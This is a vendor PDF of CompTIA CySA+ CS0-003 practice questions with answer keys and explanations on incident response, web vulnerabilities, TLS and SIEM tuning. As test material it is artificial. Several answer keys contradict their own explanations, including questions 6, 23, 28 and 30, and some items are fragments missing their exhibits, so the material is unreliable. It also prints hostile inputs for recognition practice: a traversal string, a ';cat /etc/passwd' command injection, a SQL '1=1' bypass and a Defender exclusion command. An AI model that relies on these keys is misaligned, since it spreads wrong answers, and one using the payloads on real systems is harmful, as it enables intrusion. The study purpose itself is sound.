This PDF contains a set of carefully selected practice questions for the

CS0-003 exam. These questions are designed to reflect the structure,

difficulty, and topics covered in the actual exam, helping you reinforce
your understanding and identify areas for improvement.

What's Inside:

1. Topic-focused questions based on the latest exam objectives

2. Accurate answer keys to support self-review
3. Designed to simulate the real test environment
4. Ideal for final review or daily practice

Important Note:

This material is for personal study purposes only. Please do not

redistribute or use for commercial purposes without permission.

For full access to the complete question bank and topic-wise explanations, visit:
CertQuestionsBank.com

Our YouTube: https://www.youtube.com/@CertQuestionsBank

FB page: https://www.facebook.com/certquestionsbank
Share some CS0-003 exam online questions below.
1.A security analyst is validating a particular finding that was reported in a web application
vulnerability scan to make sure it is not a false positive.
The security analyst uses the snippet below:

Which of the following vulnerability types is the security analyst validating?

A. Directory traversal
B. XSS
C. XXE
D. SSRF
Answer: B
Explanation:
XSS (cross-site scripting) is the vulnerability type that the security analyst is validating, as the snippet
shows an attempt to inject a script tag into the web application. XSS is a web security vulnerability
that allows an attacker to execute arbitrary JavaScript code in the browser of another user who visits
the vulnerable website. XSS can be used to perform various malicious actions, such as stealing
cookies, session hijacking, phishing, or defacing websites. The other vulnerability types are not
relevant to the snippet, as they involve different kinds of attacks. Directory traversal is an attack that
allows an attacker to access files and directories that are outside of the web root folder. XXE (XML
external entity) injection is an attack that allows an attacker to interfere with an application’s
processing of XML data, and potentially access files or systems. SSRF (server-side request forgery)
is an attack that allows an attacker to induce the server-side application to make requests to an
unintended location. Official
Reference: https://portswigger.net/web-security/xxe
https://portswigger.net/web-security/ssrf
https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_S
heet.html

2.During an extended holiday break, a company suffered a security incident. This information was
properly relayed to appropriate personnel in a timely manner and the server was up to date and
configured with appropriate auditing and logging. The Chief Information Security Officer wants to find
out precisely what happened.
Which of the following actions should the analyst take first?
A. Clone the virtual server for forensic analysis
B. Log in to the affected server and begin analysis of the logs
C. Restore from the last known-good backup to confirm there was no loss of connectivity
D. Shut down the affected server immediately
Answer: A
Explanation:
The first action that the analyst should take in this case is to clone the virtual server for forensic
analysis. Cloning the virtual server involves creating an exact copy or image of the server’s data and
state at a specific point in time. Cloning the virtual server can help preserve and protect any evidence
or information related to the security incident, as well as prevent any tampering, contamination, or
destruction of evidence. Cloning the virtual server can also allow the analyst to safely analyze and
investigate the incident without affecting the original server or its operations.

3.Which of the following would help an analyst to quickly find out whether the IP address in a SIEM
alert is a known-malicious IP address?
A. Join an information sharing and analysis center specific to the company's industry.
B. Upload threat intelligence to the IPS in STIX/TAXII format.
C. Add data enrichment for IPS in the ingestion pipleline.
D. Review threat feeds after viewing the SIEM alert.
Answer: C
Explanation:
The best option to quickly find out whether the IP address in a SIEM alert is a known-malicious IP
address is C. Add data enrichment for IPS in the ingestion pipeline.
Data enrichment is the process of adding more information and context to raw data, such as IP
addresses, by using external sources. Data enrichment can help analysts to gain more insights into
the nature and origin of the threats they face, and to prioritize and respond to them accordingly. Data
enrichment for IPS (Intrusion Prevention System) means that the IPS can use enriched data to block
or alert on malicious traffic based on various criteria, such as geolocation, reputation, threat
intelligence, or behavior. By adding data enrichment for IPS in the ingestion pipeline, analysts can
leverage the IPS’s capabilities to filter out known-malicious IP addresses before they reach the
SIEM, or to tag them with relevant information for further analysis. This can save time and resources
for the analysts, and improve the accuracy and efficiency of the SIEM.
The other options are not as effective or efficient as data enrichment for IPS in the ingestion pipeline.
Joining an information sharing and analysis center (ISAC) specific to the company’s industry (A) can
provide valuable threat intelligence and best practices, but it may not be timely or comprehensive
enough to cover all possible malicious IP addresses. Uploading threat intelligence to the IPS in
STIX/TAXII format (B) can help the IPS to identify and block malicious IP addresses based on
standardized indicators of compromise, but it may require manual or periodic updates and integration
with the SIEM. Reviewing threat feeds after viewing the SIEM alert (D) can help analysts to verify and
contextualize the malicious IP addresses, but it may be too late or too slow to prevent or mitigate the
damage. Therefore, C is the best option among the choices given.

4.A security analyst has found the following suspicious DNS traffic while analyzing a packet capture:
• DNS traffic while a tunneling session is active.
• The mean time between queries is less than one second.
• The average query length exceeds 100 characters.
Which of the following attacks most likely occurred?
A. DNS exfiltration
B. DNS spoofing
C. DNS zone transfer
D. DNS poisoning
Answer: A
Explanation:
DNS exfiltration is a technique that uses the DNS protocol to transfer data from a compromised
network or device to an attacker-controlled server. DNS exfiltration can bypass firewall rules and
security products that do not inspect DNS traffic. The characteristics of the suspicious DNS traffic in
the question match the indicators of DNS exfiltration, such as:
DNS traffic while a tunneling session is active: This implies that the DNS protocol is being used to
create a covert channel for data transfer.
The mean time between queries is less than one second: This implies that the DNS queries are being
sent at a high frequency to maximize the amount of data transferred.
The average query length exceeds 100 characters: This implies that the DNS queries are encoding
large amounts of data in the subdomains or other fields of the DNS packets.
Official
Reference: https://partners.comptia.org/docs/default-source/resources/comptia-cysa-cs0-002-exam-
objectives
https://resources.infosecinstitute.com/topic/bypassing-security-products-via-dns-data-exfiltration/
https://www.reddit.com/r/CompTIA/comments/nvjuzt/dns_exfiltration_explanation/

5.An analyst is reviewing a vulnerability report and must make recommendations to the executive
team. The analyst finds that most systems can be upgraded with a reboot resulting in a single
downtime window. However, two of the critical systems cannot be upgraded due to a vendor
appliance that the company does not have access to.
Which of the following inhibitors to remediation do these systems and associated vulnerabilities best
represent?
A. Proprietary systems
B. Legacy systems
C. Unsupported operating systems
D. Lack of maintenance windows
Answer: A
Explanation:
Proprietary systems are systems that are owned and controlled by a specific vendor or manufacturer,
and that use proprietary standards or protocols that are not compatible with other systems.
Proprietary systems can pose a challenge for vulnerability management, as they may not allow users
to access or modify their configuration, update their software, or patch their vulnerabilities. In this
case, two of the critical systems cannot be upgraded due to a vendor appliance that the company
does not have access to. This indicates that these systems and associated vulnerabilities are
examples of proprietary systems as inhibitors to remediation

6.While a security analyst for an organization was reviewing logs from web servers. the analyst found
several successful attempts to downgrade HTTPS sessions to use cipher modes of operation
susceptible to padding oracle attacks.
Which of the following combinations of configuration changes should the organization make to
remediate this issue? (Select two).
A. Configure the server to prefer TLS 1.3.
B. Remove cipher suites that use CBC.
C. Configure the server to prefer ephemeral modes for key exchange.
D. Require client browsers to present a user certificate for mutual authentication.
E. Configure the server to require HSTS.
F. Remove cipher suites that use GCM.
Answer: AE
Explanation:
The correct answer is A. Configure the server to prefer TLS 1.3 and B. Remove cipher suites that use
CBC.
A padding oracle attack is a type of attack that exploits the padding validation of a cryptographic
message to decrypt the ciphertext without knowing the key. A padding oracle is a system that
responds to queries about whether a message has a valid padding or not, such as a web server that
returns different error messages for invalid padding or invalid MAC. A padding oracle attack can be
applied to the CBC mode of operation, where the attacker can manipulate the ciphertext blocks and
use the oracle’s responses to recover the plaintext12.
To remediate this issue, the organization should make the following configuration changes: Configure
the server to prefer TLS 1.3. TLS 1.3 is the latest version of the Transport Layer Security protocol,
which provides secure communication between clients and servers.
TLS 1.3 has several security improvements over previous versions, such as:
It deprecates weak and obsolete cryptographic algorithms, such as RC4, MD5, SHA-1, DES, 3DES,
and CBC mode.
It supports only strong and modern cryptographic algorithms, such as AES-GCM,
ChaCha20-Poly1305, and SHA-256/384.
It reduces the number of round trips required for the handshake protocol, which improves
performance and latency.
It encrypts more parts of the handshake protocol, which enhances privacy and confidentiality.
It introduces a zero round-trip time (0-RTT) mode, which allows resuming previous sessions without
additional round trips.
It supports forward secrecy by default, which means that compromising the long-term keys does not
affect the security of past sessions3456.
Remove cipher suites that use CBC. Cipher suites are combinations of cryptographic algorithms that
specify how TLS connections are secured. Cipher suites that use CBC mode are vulnerable to
padding oracle attacks, as well as other attacks such as BEAST and Lucky 13. Therefore, they should
be removed from the server’s configuration and replaced with cipher suites that use more secure
modes of operation, such as GCM or CCM78.
The other options are not effective or necessary to remediate this issue.
Option C is not effective because configuring the server to prefer ephemeral modes for key exchange
does not prevent padding oracle attacks. Ephemeral modes for key exchange are methods that
generate temporary and random keys for each session, such as Diffie-Hellman or Elliptic Curve Diffie-
Hellman. Ephemeral modes provide forward secrecy, which means that compromising the long-term
keys does not affect the security of past sessions. However, ephemeral modes do not protect against
padding oracle attacks, which exploit the padding validation of the ciphertext rather than the key
exchange9.
Option D is not necessary because requiring client browsers to present a user certificate for mutual
authentication does not prevent padding oracle attacks. Mutual authentication is a process that
verifies the identity of both parties in a communication, such as using certificates or passwords.
Mutual authentication enhances security by preventing impersonation or spoofing attacks. However,
mutual authentication does not protect against padding oracle attacks, which exploit the padding
validation of the ciphertext rather than the authentication.
Option E is not necessary because configuring the server to require HSTS does not prevent padding
oracle attacks. HSTS stands for HTTP Strict Transport Security and it is a mechanism that forces
browsers to use HTTPS connections instead of HTTP connections when communicating with a web
server. HSTS enhances security by preventing downgrade or man-in-the-middle attacks that try to
intercept or modify HTTP traffic. However, HSTS does not protect against padding oracle attacks,
which exploit the padding validation of HTTPS traffic rather than the protocol.
Option F is not effective because removing cipher suites that use GCM does not prevent padding
oracle attacks. GCM stands for Galois/Counter Mode and it is a mode of operation that provides both
encryption and authentication for block ciphers, such as AES. GCM is more secure and efficient than
CBC mode, as it prevents various types of attacks, such as padding oracle, BEAST, Lucky 13, and IV
reuse attacks. Therefore, removing cipher suites that use GCM would reduce security rather than
enhance it.
Reference: 1 Padding oracle attack - Wikipedia
2 flast101/padding-oracle-attack-explained - GitHub
3 A Cryptographic Analysis of the TLS 1.3 Handshake Protocol | Journal of Cryptology
4 Which block cipher mode of operation does TLS 1.3 use? - Cryptography Stack Exchange
5 The Essentials of Using an Ephemeral Key Under TLS 1.3
6 Guidelines for the Selection, Configuration, and Use of … - NIST
7 CBC decryption vulnerability - .NET | Microsoft Learn
8 The Padding Oracle Attack | Robert Heaton
9 What is Ephemeral Diffie-Hellman? | Cloudflare
[10] What is Mutual TLS? How mTLS Authentication Works | Cloudflare
[11] What is HSTS? HTTP Strict Transport Security Explained | Cloudflare
[12] Galois/Counter Mode - Wikipedia
[13] AES-GCM and its IV/nonce value - Cryptography Stack Exchange

7.A security administrator needs to import Pll data records from the production environment to the test
environment for testing purposes.
Which of the following would best protect data confidentiality?
A. Data masking
B. Hashing
C. Watermarking
D. Encoding
Answer: A
Explanation:
Data masking is a technique that replaces sensitive data with fictitious or anonymized data, while
preserving the original format and structure of the data. This way, the data can be used for testing
purposes without revealing the actual Pll information. Data masking is one of the best practices for
data analysis of confidential data1.
Reference: CompTIA CySA+ CS0-003 Certification Study Guide, page 343; Best Practices for Data
Analysis of Confidential Data

8.A security analyst is trying to validate the results of a web application scan with Burp Suite.
The security analyst performs the following:

Which of the following vulnerabilitles Is the securlty analyst trylng to valldate?

A. SQL injection
B. LFI
C. XSS
D. CSRF
Answer: B
Explanation:
The security analyst is validating a Local File Inclusion (LFI) vulnerability, as indicated by the “/…/…/…/”
in the GET request which is a common indicator of directory traversal attempts associated with LFI.
The other options are not relevant for this purpose: SQL injection involves injecting malicious SQL
statements into a database query; XSS involves injecting malicious scripts into a web page; CSRF
involves tricking a user into performing an unwanted action on a web application.
Reference: According to the CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition1, one of the
objectives for the exam is to “use appropriate tools and methods to manage, prioritize and respond to
attacks and vulnerabilities”. The book also covers the usage and syntax of Burp Suite, a tool used for
testing web application security, in chapter 6. Specifically, it explains the meaning and function of
each component in Burp Suite, such as Repeater, which allows the security analyst to modify and
resend individual requests1, page 239. Therefore, this is a reliable source to verify the answer to the
question.

9.
How many employees clicked on the link in the phishing email?
According to the email server logs, 25 employees clicked on the link in the phishing email.

10.An organization enabled a SIEM rule to send an alert to a security analyst distribution list when ten
failed logins occur within one minute. However, the control was unable to detect an attack with nine
failed logins.
Which of the following best represents what occurred?
A. False positive
B. True negative
C. False negative
D. True positive
Answer: C
Explanation:
The correct answer is C. False negative.
A false negative is a situation where an attack or a threat is not detected by a security control, even
though it should have been. In this case, the SIEM rule was unable to detect an attack with nine failed
logins, which is below the threshold of ten failed logins that triggers an alert. This means that the
SIEM rule missed a potential attack and failed to alert the security analysts, resulting in a false
negative.
A false positive is a situation where a benign or normal activity is detected as an attack or a threat by
a security control, even though it is not. A true negative is a situation where a benign or normal
activity is not detected as an attack or a threat by a security control, as expected. A true positive is a
situation where an attack or a threat is detected by a security control, as expected. These are not the
correct answers for this question.

11. In the last hour, a high volume of failed RDP authentication attempts has been logged on a critical
server. All of the authentication attempts originated from the same remote IP address and made use
of a single valid domain user account.
Which of the following mitigating controls would be most effective to reduce the rate of success of this
brute-force attack? (Select two).
A. Increase the granularity of log-on event auditing on all devices.
B. Enable host firewall rules to block all outbound traffic to TCP port 3389.
C. Configure user account lockout after a limited number of failed attempts.
D. Implement a firewall block for the IP address of the remote system.
E. Install a third-party remote access tool and disable RDP on all devices.
F. Block inbound to TCP port 3389 from untrusted remote IP addresses at the perimeter firewall.
Answer: CF
Explanation:
To mitigate brute-force attacks, implementing an account lockout policy (C) prevents continuous
attempts by locking the account after a set number of failed logins. Blocking inbound connections on
TCP port 3389 (RDP) from untrusted IP addresses (F) limits access, reducing the attack surface.
According to CompTIA Security+, these controls effectively prevent unauthorized access. While
blocking specific IPs (D) or disabling RDP (E) can also help, the lockout and firewall rules provide
broader, proactive protection against this attack type.

12.An organization conducted a web application vulnerability assessment against the corporate
website, and the following output was observed:

Which of the following tuning recommendations should the security analyst share?
A. Set an HttpOnlvflaq to force communication by HTTPS
B. Block requests without an X-Frame-Options header
C. Configure an Access-Control-Allow-Origin header to authorized domains
D. Disable the cross-origin resource sharing header
Answer: B
Explanation:
The output shows that the web application is vulnerable to clickjacking attacks, which allow an
attacker to overlay a hidden frame on top of a legitimate page and trick users into clicking on
malicious links. Blocking requests without an X-Frame-Options header can prevent this attack by
instructing the browser to not display the page within a frame.
13.The following output is from a tcpdump al the edge of the corporate network:

Which of the following best describes the potential security concern?

A. Payload lengths may be used to overflow buffers enabling code execution.
B. Encapsulated traffic may evade security monitoring and defenses
C. This traffic exhibits a reconnaissance technique to create network footprints.
D. The content of the traffic payload may permit VLAN hopping.
Answer: B
Explanation:
Encapsulated traffic may evade security monitoring and defenses by hiding or obfuscating the actual
content or source of the traffic. Encapsulation is a technique that wraps data packets with additional
headers or protocols to enable communication across different network types or layers.
Encapsulation can be used for legitimate purposes, such as tunneling, VPNs, or NAT, but it can also
be used by attackers to bypass security controls or detection mechanisms that are not able to inspect
or analyze the encapsulated traffic.
Reference: https://www.techopedia.com/definition/10339/memory-dump

14.168.10.32 and 192.168.10.37 (internal network IPs)

15.While reviewing the web server logs a security analyst notices the following snippet
..\../..\../boot.ini
Which of the following is being attempted?
A. Directory traversal
B. Remote file inclusion
C. Cross-site scripting
D. Remote code execution
E. Enumeration of/etc/pasawd
Answer: A
Explanation:
The log entry "......\boot.ini" is indicative of a directory traversal attack, where an attacker attempts to
access files and directories that are stored outside the web root folder.
The log snippet "......\boot.ini" is indicative of a directory traversal attack. This type of attack aims to
access files and directories that are stored outside the web root folder. By manipulating variables that
reference files with “../” (dot-dot-slash), the attacker may be able to access arbitrary files and
directories stored on the file system.

16. K company has recently experienced a security breach via a public-facing service. Analysis of the
event on the server was traced back to the following piece of code:
SELECT ’ From userjdata WHERE Username = 0 and userid8 1 or 1=1;?
Which of the following controls would be best to implement?
A. Deploy a wireless application protocol.
B. Remove the end-of-life component.
C. Implement proper access control.
D. Validate user input.
Answer: D
Explanation:
The code snippet provided suggests an SQL injection vulnerability, indicated by the use of "1=1,"
which is a common SQL injection technique to bypass authentication. To mitigate this risk, validating
user input is the most effective control, as it ensures that any input is properly sanitized and escapes
potentially malicious characters before interacting with the database. This is a key principle from
CompTIA Security+ guidelines on secure coding practices. Options A and B are unrelated to the
vulnerability type here, and while access control (Option C) is generally good practice, it does not
specifically prevent SQL injection.

17.A security team is concerned about recent Layer 4 DDoS attacks against the company website.
Which of the following controls would best mitigate the attacks?
A. Block the attacks using firewall rules.
B. Deploy an IPS in the perimeter network.
C. Roll out a CDN.
D. Implement a load balancer.
Answer: C
Explanation:
Rolling out a CDN is the best control to mitigate the Layer 4 DDoS attacks against the company
website. A CDN is a Content Delivery Network, which is a system of distributed servers that deliver
web content to users based on their geographic location, the origin of the web page, and the content
delivery server. A CDN can help protect against Layer 4 DDoS attacks, which are volumetric attacks
that aim to exhaust the network bandwidth or resources of the target website by sending a large
amount of traffic, such as SYN floods, UDP floods, or ICMP floods. A CDN can mitigate these attacks
by distributing the traffic across multiple servers, caching the web content closer to the users, filtering
out malicious or unwanted traffic, and providing scalability and redundancy for the website12.
Reference: How to Stop a DDoS Attack: Mitigation Steps for Each OSI Layer, Application layer DDoS
attack | Cloudflare

18.When undertaking a cloud migration of multiple SaaS application, an organizations system

administrator struggled … identity and access management to cloud-based assets.
Which of the following service models would have reduced the complexity of this project?
A. CASB
B. SASE
C. ZTNA
D. SWG
Answer: A
Explanation:
A Cloud Access Security Broker (CASB) would have reduced the complexity of identity and access
management in cloud-based assets. CASBs provide visibility into cloud application usage, data
protection, and governance for cloud-based services.

19.An organization needs to bring in data collection and aggregation from various endpoints.
Which of the following is the best tool to deploy to help analysts gather this data?
A. DLP
B. NAC
C. EDR
D. NIDS
Answer: C
Explanation:
EDR stands for Endpoint Detection and Response, which is a tool that collects and aggregates data
from various endpoints, such as laptops, servers, or mobile devices. EDR helps analysts monitor,
detect, and respond to threats and incidents on the endpoints. EDR is more suitable than DLP (Data
Loss Prevention), NAC (Network Access Control), or NIDS (Network Intrusion Detection System) for
data collection and aggregation from endpoints.
Reference: CompTIA CySA+ CS0-003 Certification Study Guide, Chapter 2: Software and Systems
Security, page 75; What Is Data Aggregation? (Examples + Tools), Section: Data Aggregation: How It
Works, Subsection: 1. Data Collection.

20. A web application has a function to retrieve content from an internal URL to identify CSRF attacks
in the logs. The security analyst is building a regular expression that will filter out the correctly
formatted requests. The target URL is https://10. 1. 2.3/api, and the receiving API only accepts GET
requests and uses a single integer argument named "id."
Which of the following regular expressions should the analyst use to achieve the objective?
A. (?!https://10\.1\.2\.3/api\?id=[0-9]+)
B. "https://10\.1\.2\.3/api\?id=\d+
C. (?:"https://10\.1\.2\.3/api\?id-[0-9]+)
D. https://10\.1\.2\.3/api\?id«[0-9J$
Answer: B
Explanation:
The correct regular expression to match a GET request to this API endpoint is
"https://10\.1\.2\.3/api\?id=\d+". This pattern checks for the specific URL with an id parameter that
accepts integer values. The syntax \d+ matches one or more digits, which aligns with the requirement
for a single integer argument. Other options either use incorrect syntax or do not accurately capture
the expected URL format. Regular expressions are vital in filtering and identifying patterns in logs, as
recommended by CompTIA Cybersecurity Analyst (CySA+) practices for threat hunting and log
analysis.

21.During an incident response procedure, a security analyst acquired the needed evidence from the
hard drive of a compromised machine.
Which of the following actions should the analyst perform next to ensure the data integrity of the
evidence?
A. Generate hashes for each file from the hard drive.
B. Create a chain of custody document.
C. Determine a timeline of events using correct time synchronization.
D. Keep the cloned hard drive in a safe place.
Answer: A
Explanation:
Generating hashes for each file from the hard drive is the next action that the analyst should perform
to ensure the data integrity of the evidence. Hashing is a technique that produces a unique and fixed-
length value for a given input, such as a file or a message. Hashing can help to verify the data
integrity of the evidence by comparing the hash values of the original and copied files. If the hash
values match, then the evidence has not been altered or corrupted. If the hash values differ, then the
evidence may have been tampered with or damaged.

22.A security analyst is tasked with prioritizing vulnerabilities for remediation.

The relevant company security policies are shown below:
Security Policy 1006: Vulnerability Management

23.Which of the following is the greatest security concern regarding ICS?

A. The involved systems are generally hard to identify.
B. The systems are configured for automatic updates, leading to device failure.
C. The systems are oftentimes air gapped, leading to fileless malware attacks.
D. Issues on the systems cannot be reversed without rebuilding the systems.
Answer: C
Explanation:
Industrial control systems (ICS) are systems that monitor and control physical processes, such as
power generation, water treatment, manufacturing, and transportation. ICS are often critical for public
safety and national security, and therefore a prime target for cyberattacks. One of the greatest
security concerns regarding ICS is that issues on the systems cannot be reversed without rebuilding
the systems. This means that any damage or disruption caused by an attack can have long-lasting
and catastrophic consequences for the physical infrastructure and human lives. The other options are
not true or not specific to ICS.
Reference: CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page
13; https://www.us-cert.gov/ics/What-are-Industrial-Control-Systems

24.A technician working at company.com received the following email:

After looking at the above communication, which of the following should the technician recommend to
the security team to prevent exposure of sensitive information and reduce the risk of corporate data
being stored on non-corporate assets?
A. Forwarding of corporate email should be disallowed by the company.
B. A VPN should be used to allow technicians to troubleshoot computer issues securely.
C. An email banner should be implemented to identify emails coming from external sources.
D. A rule should be placed on the DLP to flag employee IDs and serial numbers.
Answer: C
Explanation:
An email banner is a message that is added to the top or bottom of an email to provide some
information or warning to the recipient. An email banner should be implemented to identify emails
coming from external sources to prevent exposure of sensitive information and reduce the risk of
corporate data being stored on non-corporate assets. An email banner can help employees recognize
phishing or spoofing attempts and avoid clicking on malicious links or attachments. It can also remind
employees not to share confidential information with external parties or forward corporate emails to
personal accounts. The other options are not relevant or effective for this purpose.
Reference: CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page
13; https://www.csoonline.com/article/3235970/what-is-spoofing-definition-and-how-to-prevent-it.html

25.An employee downloads a freeware program to change the desktop to the classic look of legacy
Windows. Shortly after the employee installs the program, a high volume of random DNS queries
begin to originate from the system.
An investigation on the system reveals the following:
Add-MpPreference -ExclusionPath '%Program Filest\ksysconfig'
Which of the following is possibly occurring?
A. Persistence
B. Privilege escalation
C. Credential harvesting
D. Defense evasion
Answer: D
Explanation:
Defense evasion is the technique of avoiding detection or prevention by security tools or
mechanisms. In this case, the freeware program is likely a malware that generates random DNS
queries to communicate with a command and control server or exfiltrate data. The command Add-
MpPreference -ExclusionPath '%Program Filest\ksysconfig' is used to add an exclusion path to
Windows Defender, which is a built-in antivirus software, to prevent it from scanning the malware
folder.
Reference: CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 5, page 204;
CompTIA CySA+ CS0-003 Certification Study Guide, Chapter 5, page 212. pr

26.A zero-day command injection vulnerability was published.

A security administrator is analyzing the following logs for evidence of adversaries attempting to
exploit the vulnerability:

Which of the following log entries provides evidence of the attempted exploit?
A. Log entry 1
B. Log entry 2
C. Log entry 3
D. Log entry 4
Answer: D
Explanation:
Log entry 4 shows an attempt to exploit the zero-day command injection vulnerability by appending a
malicious command (;cat /etc/passwd) to the end of a legitimate request (/cgi-
bin/index.cgi?name=John). This command would try to read the contents of the /etc/passwd file,
which contains user account information, and could lead to further compromise of the system. The
other log entries do not show any signs of command injection, as they do not contain any special
characters or commands that could alter the intended behavior of the application. Official
Reference: https://www.imperva.com/learn/application-security/command-injection/
https://www.zerodayinitiative.com/advisories/published/

27.After a security assessment was done by a third-party consulting firm, the cybersecurity program
recommended integrating DLP and CASB to reduce analyst alert fatigue.
Which of the following is the best possible outcome that this effort hopes to achieve?
A. SIEM ingestion logs are reduced by 20%.
B. Phishing alerts drop by 20%.
C. False positive rates drop to 20%.
D. The MTTR decreases by 20%.
Answer: D
Explanation:
The MTTR (Mean Time to Resolution) decreases by 20% is the best possible outcome that this effort
hopes to achieve, as it reflects the improvement in the efficiency and effectiveness of the incident
response process by reducing analyst alert fatigue. Analyst alert fatigue is a term that refers to the
phenomenon of security analysts becoming overwhelmed, desensitized, or exhausted by the large
number of alerts they receive from various security tools or systems, such as DLP (Data Loss
Prevention) or CASB (Cloud Access Security Broker). DLP is a security solution that helps to prevent
unauthorized access, use, or transfer of sensitive data, such as personal information, intellectual
property, or financial records. CASB is a security solution that helps to monitor and control the use of
cloud-based applications and services, such as SaaS (Software as a Service), PaaS (Platform as a
Service), or IaaS (Infrastructure as a Service). Both DLP and CASB can generate alerts when they
detect potential data breaches, policy violations, or malicious activities, but they can also produce
false positives, irrelevant information, or duplicate notifications that can overwhelm or distract the
security analysts. Analyst alert fatigue can have negative consequences for the security posture and
performance of an organization, such as missing or ignoring critical alerts, delaying or skipping
investigations or remediations, making errors or mistakes, or losing motivation or morale. Therefore, it
is important to reduce analyst alert fatigue and optimize the alert management process by using
various strategies, such as tuning the alert thresholds and rules, prioritizing and triaging the alerts
based on severity and context, enriching and correlating the alerts with additional data sources,
automating or orchestrating repetitive or low-level tasks or actions, or integrating and consolidating
different security tools or systems into a unified platform. By reducing analyst alert fatigue and
optimizing the alert management process, the effort hopes to achieve a decrease in the MTTR, which
is a metric that measures the average time it takes to resolve an incident from the moment it is
reported to the moment it is closed. A lower MTTR indicates a faster and more effective incident
response process, which can help to minimize the impact and damage of security incidents, improve
customer satisfaction and trust, and enhance security operations and outcomes. The other options
are not as relevant or realistic as the MTTR decreases by 20%, as they do not reflect the best
possible outcome that this effort hopes to achieve. SIEM ingestion logs are reduced by 20% is not a
relevant outcome, as it does not indicate any improvement in the incident response process or any
reduction in analyst alert fatigue. SIEM (Security Information and Event Management) is a security
solution that collects and analyzes data from various sources, such as logs, events, or alerts, and
provides security monitoring, threat detection, and incident response capabilities. SIEM ingestion logs
are records of the data that is ingested by the SIEM system from different sources. Reducing SIEM
ingestion logs may imply less data volume or less data sources for the SIEM system, which may not
necessarily improve its performance or accuracy. Phishing alerts drop by 20% is not a realistic
outcome, as it does not depend on the integration of DLP and CASB or any reduction in analyst alert
fatigue. Phishing alerts are notifications that indicate potential phishing attempts or attacks, such as
fraudulent emails, websites, or messages that try to trick users into revealing sensitive information or
installing malware. Phishing alerts can be generated by various security tools or systems, such as
email security solutions, web security solutions, endpoint security solutions, or user awareness
training programs. Reducing phishing alerts may imply less phishing attempts or attacks on the
organization, which may not necessarily be influenced by the integration of DLP and CASB or any
reduction in analyst alert fatigue. False positive rates drop to 20% is not a realistic outcome

28.A security analyst discovers an ongoing ransomware attack while investigating a phishing email.
The analyst downloads a copy of the file from the email and isolates the affected workstation from the
network.
Which of the following activities should the analyst perform next?
A. Wipe the computer and reinstall software
B. Shut down the email server and quarantine it from the network.
C. Acquire a bit-level image of the affected workstation.
D. Search for other mail users who have received the same file.
Answer: C
Explanation:
Searching for other mail users who have received the same file is the best activity to perform next, as
it helps to identify and contain the scope of the ransomware attack and prevent further damage.
Ransomware is a type of malware that encrypts files on a system and demands payment for their
decryption. Ransomware can spread through phishing emails that contain malicious attachments or
links that download the ransomware. By searching for other mail users who have received the same
file, the analyst can alert them not to open it, delete it from their inboxes, and scan their systems for
any signs of infection. The other activities are not as urgent or effective as searching for other mail
users who have received the same file, as they do not address the immediate threat of ransomware
spreading or affecting more systems. Wiping the computer and reinstalling software may restore the
functionality of the affected workstation, but it will also erase any evidence of the ransomware attack
and make recovery of encrypted files impossible. Shutting down the email server and quarantining it
from the network may stop the delivery of more phishing emails, but it will also disrupt normal
communication and operations for the organization. Acquiring a bit-level image of the affected
workstation may preserve the evidence of the ransomware attack, but it will not help to stop or
remove the ransomware or decrypt the files.

29. HOTSPOT
An organization has noticed large amounts of data are being sent out of its network. An analyst is
identifying the cause of the data exfiltration.

INSTRUCTIONS
Select the command that generated the output in tabs 1 and 2.
Review the output text in all tabs and identify the file responsible for the malicious behavior.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All
button.
Answer:
Select the command that generated the output in tab 1:
netstat -bo
Select the command that generated the output in tab 2:
tasklist
Identify the file responsible for the malicious behavior:
cmd.exe
Select the command that generated the output in tab 1: The output in tab 1 displays active network
connections, which can be generated using the netstat command with options to display the owning
process ID.
Select the command that generated the output in tab 1:
netstat -bo
Select the command that generated the output in tab 2: The output in tab 2 lists the running
processes with their PIDs and memory usage, which can be generated using the tasklist command.
Select the command that generated the output in tab 2: tasklist
Identify the file responsible for the malicious behavior: To identify the malicious file, we compare the
hashes of the current files against the baseline hashes. From the provided data:
The hash for cmd.exe in the current state (tab 3) is 372ab227fd5ea779c211a1451881d1e 1.
The baseline hash for cmd.exe (tab 4) is a2cdef1c445d3890cc3456789058cd2 1.
Since these hashes do not match, cmd.exe is the file responsible for the malicious behavior.

30.During an audit, several customer order forms were found to contain inconsistencies between the
actual price of an item and the amount charged to the customer. Further investigation narrowed the
cause of the issue to manipulation of the public-facing web form used by customers to order products.
Which of the following would be the best way to locate this issue?
A. Reduce the session timeout threshold
B. Deploy MFA for access to the web server.
C. Implement input validation.
D. Run a dynamic code analysis.
Answer: D
Explanation:
Implementing input validation is the best way to locate and prevent the issue of manipulation of the
public-facing web form used by customers to order products. Input validation is a technique that
checks and filters any user input that is sent to an application before processing it. Input validation
can help to ensure that the user input conforms to the expected format, length and type, and does not
contain any malicious characters or syntax that may alter the logic or behavior of the application.
Input validation can also reject or sanitize any input that does not meet the validation criteria.
Reference: https://portswigger.net/web-security/input-validation

31. A list of loCs released by a government security organization contains the SHA-256 hash for a
Microsoft-signed legitimate binary, svchost. exe.
Which of the following best describes the result if security teams add this indicator to their detection
signatures?
A. This indicator would fire on the majority of Windows devices.
B. Malicious files with a matching hash would be detected.
C. Security teams would detect rogue svchost. exe processes in their environment.
D. Security teams would detect event entries detailing executionof known-malicious svchost. exe
processes.
Answer: A
Explanation:
Adding the SHA-256 hash of a legitimate Microsoft-signed binary like svchost.exe to detection
signatures would result in the indicator firing on the majority of Windows devices. Svchost.exe is a
common and legitimate system process used by Windows, and using its hash as an indicator of
compromise (IOC) would generate numerous false positives, as it would match the legitimate
instances of svchost.exe running on all Windows systems.

32. Which of the following best explains the importance of the implementation of a secure software
development life cycle in a company with an internal development team?
